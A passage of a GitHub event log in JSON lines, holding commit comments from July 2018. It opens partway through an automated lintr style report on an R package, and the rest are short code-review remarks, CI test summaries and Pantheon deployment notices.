                                                 ^~~~~~~\n```\n[R/profileDat.R:24:3:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L24) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$top_5_val_pct <- round(sapply(x, function(x) sum(sum(rankTab(x)[1:5, \"Freq\"], na.rm = TRUE)) / length(x)), 4)\n  ^~~~~~\n```\n[R/profileDat.R:24:10:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L24) *style:* **Variable and function names should not use underscores.**\n```r\n​  pro_df$top_5_val_pct <- round(sapply(x, function(x) sum(sum(rankTab(x)[1:5, \"Freq\"], na.rm = TRUE)) / length(x)), 4)\n         ^~~~~~~~~~~~~\n```\n[R/profileDat.R:27:10:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/profileDat.R#L27) *style:* **Variable and function names should not use underscores.**\n```r\n​  return(pro_df)\n         ^~~~~~\n```\n[R/rankTab.R:12:34:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/rankTab.R#L12) *style:* **Commas should always have a space after.**\n```r\n​  tab1 <- tab1[order(-tab1$Freq),]\n                                 ^\n```\n[R/setTypes.R:15:39:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L15) *style:* **Only use double-quotes.**\n```r\n​    df1 <- data.frame(var = i, type = '', stringsAsFactors = F)\n                                      ^~\n```\n[R/setTypes.R:17:30:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L17) *style:* **Commas should always have a space after.**\n```r\n​    print(as.character(x[1:5,i]));flush.console()\n                             ^\n```\n[R/setTypes.R:19:11:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L19) *style:* **Commas should always have a space after.**\n```r\n​    df1[1,'type'] <- readline(' Type - f / n / c ?')\n          ^\n```\n[R/setTypes.R:19:11:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L19) *style:* **Only use double-quotes.**\n```r\n​    df1[1,'type'] <- readline(' Type - f / n / c ?')\n          ^~~~~~\n```\n[R/setTypes.R:19:31:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L19) *style:* **Only use double-quotes.**\n```r\n​    df1[1,'type'] <- readline(' Type - f / n / c ?')\n                              ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/setTypes.R:25:30:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L25) *style:* **Only use double-quotes.**\n```r\n​  charVar <- df2[df2$type == 'c','var']\n                             ^~~\n```\n[R/setTypes.R:25:34:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  charVar <- df2[df2$type == 'c','var']\n                                 ^\n```\n[R/setTypes.R:25:34:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L25) *style:* **Only use double-quotes.**\n```r\n​  charVar <- df2[df2$type == 'c','var']\n                                 ^~~~~\n```\n[R/setTypes.R:26:29:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L26) *style:* **Only use double-quotes.**\n```r\n​  numVar <- df2[df2$type == 'n','var']\n                            ^~~\n```\n[R/setTypes.R:26:33:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L26) *style:* **Commas should always have a space after.**\n```r\n​  numVar <- df2[df2$type == 'n','var']\n                                ^\n```\n[R/setTypes.R:26:33:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L26) *style:* **Only use double-quotes.**\n```r\n​  numVar <- df2[df2$type == 'n','var']\n                                ^~~~~\n```\n[R/setTypes.R:27:30:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L27) *style:* **Only use double-quotes.**\n```r\n​  factVar <- df2[df2$type == 'f','var']\n                             ^~~\n```\n[R/setTypes.R:27:34:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L27) *style:* **Commas should always have a space after.**\n```r\n​  factVar <- df2[df2$type == 'f','var']\n                                 ^\n```\n[R/setTypes.R:27:34:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L27) *style:* **Only use double-quotes.**\n```r\n​  factVar <- df2[df2$type == 'f','var']\n                                 ^~~~~\n```\n[R/setTypes.R:29:6:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L29) *style:* **Commas should always have a space after.**\n```r\n​  x[,charVar] <- as.data.frame(lapply(x[,charVar], as.character))\n     ^\n```\n[R/setTypes.R:29:42:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L29) *style:* **Commas should always have a space after.**\n```r\n​  x[,charVar] <- as.data.frame(lapply(x[,charVar], as.character))\n                                         ^\n```\n[R/setTypes.R:30:6:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L30) *style:* **Commas should always have a space after.**\n```r\n​  x[,numVar] <- as.data.frame(lapply(x[,numVar], function(x) return(as.numeric(as.character(x)))))\n     ^\n```\n[R/setTypes.R:30:41:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L30) *style:* **Commas should always have a space after.**\n```r\n​  x[,numVar] <- as.data.frame(lapply(x[,numVar], function(x) return(as.numeric(as.character(x)))))\n                                        ^\n```\n[R/setTypes.R:31:6:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L31) *style:* **Commas should always have a space after.**\n```r\n​  x[,factVar] <- as.data.frame(lapply(x[,factVar], as.factor))\n     ^\n```\n[R/setTypes.R:31:42:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/R/setTypes.R#L31) *style:* **Commas should always have a space after.**\n```r\n​  x[,factVar] <- as.data.frame(lapply(x[,factVar], as.factor))\n                                         ^\n```\n[tests/testthat/test-clusDropVar2.R:7:81:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-clusDropVar2.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- clusDropVar(iris, 3:5, threshold = .6, vte = \"Species\", xLoopsBeforePrint=1)\n                                                                               ~^~\n```\n[tests/testthat/test-lint.R:5:5:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L5) *style:* **Variable and function names should not use underscores.**\n```r\n​    my_linters <- list(\n    ^~~~~~~~~~\n```\n[tests/testthat/test-lint.R:6:28:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​      absolute_paths_linter=absolute_paths_linter,\n                          ~^~\n```\n[tests/testthat/test-lint.R:7:24:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​      assignment_linter=assignment_linter,\n                      ~^~\n```\n[tests/testthat/test-lint.R:8:26:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​      closed_curly_linter=closed_curly_linter,\n                        ~^~\n```\n[tests/testthat/test-lint.R:9:20:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​      commas_linter=commas_linter,\n                  ~^~\n```\n[tests/testthat/test-lint.R:11:26:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​      infix_spaces_linter=infix_spaces_linter,\n                        ~^~\n```\n[tests/testthat/test-lint.R:12:25:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​      line_length_linter=line_length_linter,\n                       ~^~\n```\n[tests/testthat/test-lint.R:13:20:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​      no_tab_linter=no_tab_linter,\n                  ~^~\n```\n[tests/testthat/test-lint.R:14:26:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​      object_usage_linter=object_usage_linter,\n                        ~^~\n```\n[tests/testthat/test-lint.R:15:24:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​      snake_case_linter=snake_case_linter,\n                      ~^~\n```\n[tests/testthat/test-lint.R:16:27:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​      multiple_dots_linter=multiple_dots_linter,\n                         ~^~\n```\n[tests/testthat/test-lint.R:17:27:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​      object_length_linter=object_length_linter,\n                         ~^~\n```\n[tests/testthat/test-lint.R:18:24:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​      open_curly_linter=open_curly_linter,\n                      ~^~\n```\n[tests/testthat/test-lint.R:19:27:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​      single_quotes_linter=single_quotes_linter,\n                         ~^~\n```\n[tests/testthat/test-lint.R:20:27:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​      spaces_inside_linter=spaces_inside_linter,\n                         ~^~\n```\n[tests/testthat/test-lint.R:22:34:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​      trailing_blank_lines_linter=trailing_blank_lines_linter,\n                                ~^~\n```\n[tests/testthat/test-lint.R:23:33:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​      trailing_whitespace_linter=trailing_whitespace_linter\n                               ~^~\n```\n[tests/testthat/test-lint.R:25:36:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​    lintr::expect_lint_free(linters=my_linters)\n                                  ~^~\n```\n[tests/testthat/test-lint.R:25:37:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-lint.R#L25) *style:* **Variable and function names should not use underscores.**\n```r\n​    lintr::expect_lint_free(linters=my_linters)\n                                    ^~~~~~~~~~\n```\n[tests/testthat/test-naHandler.R:15:7:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-naHandler.R#L15) *style:* **Commas should always have a space after.**\n```r\n​  x[1,] <- NA\n      ^\n```\n[tests/testthat/test-naHandler.R:17:18:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-naHandler.R#L17) *style:* **Only use double-quotes.**\n```r\n​  expect_is(nas, 'list')\n                 ^~~~~~\n```\n[tests/testthat/test-rankTab.R:10:28:](https://github.com/barrenWuffet/convPkg/blob/f4e482b33db249527739d00443792377dfd08ea1/tests/testthat/test-rankTab.R#L10) *style:* **Commas should always have a space after.**\n```r\n​  expect_equal(dim(d), c(3,2))\n                           ^\n```"}},"created_at":"2018-07-13T21:53:59Z"}
{"id":"7964526817","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29705878,"position":45,"line":30,"path":"test/Splitter.js","commit_id":"ce742760c48dc09e81ab99f394fd86520eba0979","created_at":"2018-07-13T21:54:05Z","updated_at":"2018-07-13T21:54:05Z","author_association":"NONE","body":"`assert.isFalse(status, \"\")`"}},"created_at":"2018-07-13T21:54:05Z"}
{"id":"7964528218","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29705884,"position":51,"line":35,"path":"test/Splitter.js","commit_id":"ce742760c48dc09e81ab99f394fd86520eba0979","created_at":"2018-07-13T21:54:32Z","updated_at":"2018-07-13T21:54:32Z","author_association":"NONE","body":"You should use the `instance`."}},"created_at":"2018-07-13T21:54:32Z"}
{"id":"7964528634","type":"CommitCommentEvent","actor":{"login":"spidemen"},"repo":{"name":"spidemen/machine-learning"},"payload":{"comment":{"id":29705885,"position":null,"line":null,"path":null,"commit_id":"5f5b5b293c528aa0b48c985b28fe14614aaf1548","created_at":"2018-07-13T21:54:40Z","updated_at":"2018-07-13T21:54:40Z","author_association":"OWNER","body":"Compare accuracy of different classifers"}},"created_at":"2018-07-13T21:54:40Z"}
{"id":"7964529592","type":"CommitCommentEvent","actor":{"login":"jimjibone"},"repo":{"name":"naggie/sd01"},"payload":{"comment":{"id":29705887,"position":null,"line":null,"path":null,"commit_id":"77b7ec831dfbf79de2c1325bca738adb3669ccbb","created_at":"2018-07-13T21:54:58Z","updated_at":"2018-07-13T21:54:58Z","author_association":"COLLABORATOR","body":"Yeah, it's a shame that the standard log package doesn't include levels.\r\n\r\nI have my own log in woodhouse when the controller is detected, using levelled logs from [logrus](https://github.com/sirupsen/logrus) (there may be better levelled log packages, though).\r\n\r\nI think for sd01 it's maybe better to remove the log or add something like an `enableDebug(bool)` method."}},"created_at":"2018-07-13T21:54:58Z"}
{"id":"7964532797","type":"CommitCommentEvent","actor":{"login":"kungfubozo"},"repo":{"name":"explodingbarrel/unityCacheServer"},"payload":{"comment":{"id":29705895,"position":5,"line":41,"path":"lib/server/command_processor.js","commit_id":"eea9f874b66b268a22e3ff5534c0e54433ba33ca","created_at":"2018-07-13T21:55:59Z","updated_at":"2018-07-13T21:55:59Z","author_association":"CONTRIBUTOR","body":"sry what i meant is \"kabam-<username>\" for example\r\n\r\nso, my would be kabam-mko or kabam-mo"}},"created_at":"2018-07-13T21:55:59Z"}
{"id":"7964533493","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29705899,"position":null,"line":null,"path":null,"commit_id":"814372513e0b5ca20e00518737f7c55dc7bf5dbf","created_at":"2018-07-13T21:56:12Z","updated_at":"2018-07-13T21:56:12Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2927 of 2936 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 9 tests had: EIO diffs.\n * 9 tests had: Table big diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 614\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.69%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T21:56:12Z"}
{"id":"7964534337","type":"CommitCommentEvent","actor":{"login":"pkboom"},"repo":{"name":"pkboom/refactoring-data"},"payload":{"comment":{"id":29705901,"position":null,"line":null,"path":null,"commit_id":"0caba3b85982ce62d359dc1fa2dcf0f3383f2f85","created_at":"2018-07-13T21:56:28Z","updated_at":"2018-07-13T21:56:28Z","author_association":"OWNER","body":"https://medium.com/@codingcave/refactoring-data-in-a-production-laravel-application-b66526ae386"}},"created_at":"2018-07-13T21:56:28Z"}
{"id":"7964537726","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29705903,"position":null,"line":null,"path":null,"commit_id":"257e9fcf672a2636bbadaff4e13b865a3f5b0453","created_at":"2018-07-13T21:57:30Z","updated_at":"2018-07-13T21:57:30Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-react](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-react).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-react-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-13T21:57:30Z"}
{"id":"7964539556","type":"CommitCommentEvent","actor":{"login":"DGLAZ"},"repo":{"name":"DGLAZ/flexbox"},"payload":{"comment":{"id":29705908,"position":5,"line":12,"path":"index.html","commit_id":"a02991979dcf432e1bd53aa891e1be88ff67ab69","created_at":"2018-07-13T21:58:05Z","updated_at":"2018-07-13T21:58:05Z","author_association":"OWNER","body":"cool\r\n"}},"created_at":"2018-07-13T21:58:05Z"}
{"id":"7964553505","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-website"},"payload":{"comment":{"id":29705943,"position":null,"line":null,"path":null,"commit_id":"95621ed6bdcd65b3408208c3e738bb6d514d08a6","created_at":"2018-07-13T22:02:08Z","updated_at":"2018-07-13T22:02:08Z","author_association":"OWNER","body":"Do you mean like this?\r\n```\r\n##### July 11, 2018\r\n\r\n#### [Monitoring HTTP Latency with OpenCensus and Stackdriver](https://medium.com/google-cloud/monitoring-http-latency-with-opencensus-and-stackdriver-bf561608e81a)\r\n\r\nThis post will describe how to code your own monitoring probes, similar in function to Stackdriver uptime checks on Google Cloud. Code, configuration files, commands, and detailed instructions… [\\[read more\\]](https://medium.com/google-cloud/monitoring-http-latency-with-opencensus-and-stackdriver-bf561608e81a)\r\n\r\n---\r\n```\r\n\r\n##### July 11, 2018\r\n\r\n#### [Monitoring HTTP Latency with OpenCensus and Stackdriver](https://medium.com/google-cloud/monitoring-http-latency-with-opencensus-and-stackdriver-bf561608e81a)\r\n\r\nThis post will describe how to code your own monitoring probes, similar in function to Stackdriver uptime checks on Google Cloud. Code, configuration files, commands, and detailed instructions… [\\[read more\\]](https://medium.com/google-cloud/monitoring-http-latency-with-opencensus-and-stackdriver-bf561608e81a)\r\n\r\n---"}},"created_at":"2018-07-13T22:02:08Z"}
{"id":"7964554702","type":"CommitCommentEvent","actor":{"login":"CleitonCorrea"},"repo":{"name":"CleitonCorrea/WebService-com-Node-e-Expres"},"payload":{"comment":{"id":29705948,"position":null,"line":null,"path":null,"commit_id":"392a0519ff5c9994f762d36efd69ac10f84f109f","created_at":"2018-07-13T22:02:30Z","updated_at":"2018-07-13T22:02:30Z","author_association":"OWNER","body":"Atualização do Sistemas realizada dia 13/07 sexta-feira as 19:02\r\nFoi inserido ícones para representar as prioridades dos tickets de atendimento"}},"created_at":"2018-07-13T22:02:30Z"}
{"id":"7964560876","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29705958,"position":null,"line":null,"path":null,"commit_id":"ab47c9e3ff051ee338632b63035b6cf5580eb847","created_at":"2018-07-13T22:04:07Z","updated_at":"2018-07-13T22:04:07Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-211](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-211).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-211-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T22:04:07Z"}
{"id":"7964561340","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaCI/Appveyor.jl"},"payload":{"comment":{"id":29705959,"position":35,"line":35,"path":"bin/install.ps1","commit_id":"0c08798cb5c0976ca9a701845fc14c042878d28b","created_at":"2018-07-13T22:04:14Z","updated_at":"2018-07-13T22:04:14Z","author_association":"NONE","body":"This should be avoided."}},"created_at":"2018-07-13T22:04:14Z"}
{"id":"7964562572","type":"CommitCommentEvent","actor":{"login":"rakyll"},"repo":{"name":"adamgarza/opencensus-website"},"payload":{"comment":{"id":29705962,"position":null,"line":null,"path":null,"commit_id":"95621ed6bdcd65b3408208c3e738bb6d514d08a6","created_at":"2018-07-13T22:04:38Z","updated_at":"2018-07-13T22:04:38Z","author_association":"NONE","body":"@adamgarza, yup!"}},"created_at":"2018-07-13T22:04:38Z"}
{"id":"7964565218","type":"CommitCommentEvent","actor":{"login":"WilliamDenniss"},"repo":{"name":"openid/AppAuth-iOS"},"payload":{"comment":{"id":29705965,"position":2,"line":1,"path":"Examples/Example-iOS_ObjC-Carthage/Cartfile","commit_id":"70c1d55c4955a2535870ac9d8c3b555820ab7a99","created_at":"2018-07-13T22:05:29Z","updated_at":"2018-07-13T22:05:29Z","author_association":"MEMBER","body":"Thanks"}},"created_at":"2018-07-13T22:05:29Z"}
{"id":"7964568194","type":"CommitCommentEvent","actor":{"login":"coelckers"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29705972,"position":null,"line":null,"path":null,"commit_id":"d12a1ed05e9221f2bfa855c77e59b705376a93b1","created_at":"2018-07-13T22:06:26Z","updated_at":"2018-07-13T22:06:26Z","author_association":"OWNER","body":"Still a looooong way to go. Vulkan is really obtuse and understanding all this stuff hard. Without some working example to build upon this would stand no chance.\r\n"}},"created_at":"2018-07-13T22:06:26Z"}
{"id":"7964568506","type":"CommitCommentEvent","actor":{"login":"wayne-t"},"repo":{"name":"juvoinc/airflow"},"payload":{"comment":{"id":29705973,"position":5,"line":59,"path":"airflow/www/app.py","commit_id":"3269e6330f4c916e3dcfb4d997ca24831be9fbf6","created_at":"2018-07-13T22:06:32Z","updated_at":"2018-07-13T22:06:32Z","author_association":"NONE","body":"do you really need those single quotes? Checking your previous commit, many other similar lines were without them."}},"created_at":"2018-07-13T22:06:32Z"}
{"id":"7964573258","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29705989,"position":null,"line":null,"path":null,"commit_id":"afa73ed612a76bc24a2d4df7786361643f8e7a97","created_at":"2018-07-13T22:08:07Z","updated_at":"2018-07-13T22:08:07Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-488](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-488).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-488-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-13T22:08:07Z"}
{"id":"7964578927","type":"CommitCommentEvent","actor":{"login":"LMMFHHO"},"repo":{"name":"LMMFHHO/device_xiaomi_msm8998-common"},"payload":{"comment":{"id":29706003,"position":null,"line":null,"path":null,"commit_id":"058506bdbf18a5b55f2589a7d65387f8b4e48a11","created_at":"2018-07-13T22:10:02Z","updated_at":"2018-07-13T22:10:02Z","author_association":"OWNER","body":"originally written by Demon000"}},"created_at":"2018-07-13T22:10:02Z"}
{"id":"7964586992","type":"CommitCommentEvent","actor":{"login":"hdevalence"},"repo":{"name":"isislovecruft/ed25519-dalek"},"payload":{"comment":{"id":29706026,"position":49,"line":1104,"path":"src/ed25519.rs","commit_id":"0cb5b55dff647530253bb16b62dc1d3548faf37f","created_at":"2018-07-13T22:12:44Z","updated_at":"2018-07-13T22:12:44Z","author_association":"NONE","body":"much saltier than libsodium"}},"created_at":"2018-07-13T22:12:44Z"}
{"id":"7964587399","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29706027,"position":null,"line":null,"path":null,"commit_id":"5c08b3c35b565d34e0e6c9796497c91b8d3e3494","created_at":"2018-07-13T22:12:52Z","updated_at":"2018-07-13T22:12:52Z","author_association":"COLLABORATOR","body":"As a status update: there are many functions that need to be removed; labels that need to be renamed due to poor naming choices; hacks that can be replaced with the migration of the case studies using appropriate types instead of `Contents`; etc. I'll soon be opening up multiple issues for these (and more) required updates."}},"created_at":"2018-07-13T22:12:52Z"}
{"id":"7964596547","type":"CommitCommentEvent","actor":{"login":"droot"},"repo":{"name":"kubernetes-sigs/controller-runtime"},"payload":{"comment":{"id":29706054,"position":8,"line":9,"path":"pkg/runtime/log/log.go","commit_id":"1a1d5cc961dd86c5ebf367dba43d81987db89448","created_at":"2018-07-13T22:15:58Z","updated_at":"2018-07-13T22:15:58Z","author_association":"CONTRIBUTOR","body":"zaplogr is still being used in the code below. "}},"created_at":"2018-07-13T22:15:58Z"}
{"id":"7964601368","type":"CommitCommentEvent","actor":{"login":"BeckyDTP"},"repo":{"name":"Sigil-Ebook/Sigil"},"payload":{"comment":{"id":29706060,"position":null,"line":null,"path":null,"commit_id":"e7d04a46e87ebbd19a0f71c497a827945828db58","created_at":"2018-07-13T22:17:35Z","updated_at":"2018-07-13T22:17:35Z","author_association":"CONTRIBUTOR","body":"When the base.ts file will be updated on the Transifex site?\r\n"}},"created_at":"2018-07-13T22:17:35Z"}
{"id":"7964602003","type":"CommitCommentEvent","actor":{"login":"Mhiho"},"repo":{"name":"Mhiho/catsChildrenAndTheProject"},"payload":{"comment":{"id":29706062,"position":6,"line":6,"path":"src/store/actions/firebase.js","commit_id":"17144816a5875f89f29a3dcb0fff23e6eed8a120","created_at":"2018-07-13T22:17:48Z","updated_at":"2018-07-13T22:17:48Z","author_association":"OWNER","body":"OK api was deleted, my bad, but it only for testing anyway"}},"created_at":"2018-07-13T22:17:48Z"}
{"id":"7964602412","type":"CommitCommentEvent","actor":{"login":"whiteShtef"},"repo":{"name":"gnustep/libs-quartzcore"},"payload":{"comment":{"id":29706066,"position":null,"line":null,"path":null,"commit_id":"77cd36a9a1c07c01286b394cd053cc51129a0adf","created_at":"2018-07-13T22:17:57Z","updated_at":"2018-07-13T22:17:57Z","author_association":"CONTRIBUTOR","body":"@fredkiefer I fixed all of the things you mentioned, will merge them in a following PR."}},"created_at":"2018-07-13T22:17:57Z"}
{"id":"7964606020","type":"CommitCommentEvent","actor":{"login":"PersonTheCat"},"repo":{"name":"PersonTheCat/Geolosys"},"payload":{"comment":{"id":29706083,"position":null,"line":null,"path":null,"commit_id":"1e56feb7545606400ee38217c032312120072416","created_at":"2018-07-13T22:19:12Z","updated_at":"2018-07-13T22:19:12Z","author_association":"OWNER","body":"Large changes to main were just ctrl+shift+o managing / rearranging the imports"}},"created_at":"2018-07-13T22:19:12Z"}
{"id":"7964607939","type":"CommitCommentEvent","actor":{"login":"xiazen"},"repo":{"name":"dotnet/orleans"},"payload":{"comment":{"id":29706090,"position":null,"line":null,"path":null,"commit_id":"58cd7adbf7eac1e749aa78fc376c0e38c95e7952","created_at":"2018-07-13T22:19:53Z","updated_at":"2018-07-13T22:19:53Z","author_association":"CONTRIBUTOR","body":"do you need to serialize `localParticipants ` in this case? mark it as json property? Is this the transactional state you are referring? \r\n```\r\n  public class TransactionParticipantExtension : ITransactionParticipantExtension\r\n    {\r\n        private readonly Dictionary<string, ITransactionParticipant> localParticipants = new Dictionary<string, ITransactionParticipant>();\r\n}\r\n```"}},"created_at":"2018-07-13T22:19:53Z"}
{"id":"7964608639","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29706091,"position":null,"line":null,"path":null,"commit_id":"f91629cd920a29221bdd9a541caf6eff3f34b294","created_at":"2018-07-13T22:20:09Z","updated_at":"2018-07-13T22:20:09Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-3](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-3).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-3-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-13T22:20:09Z"}
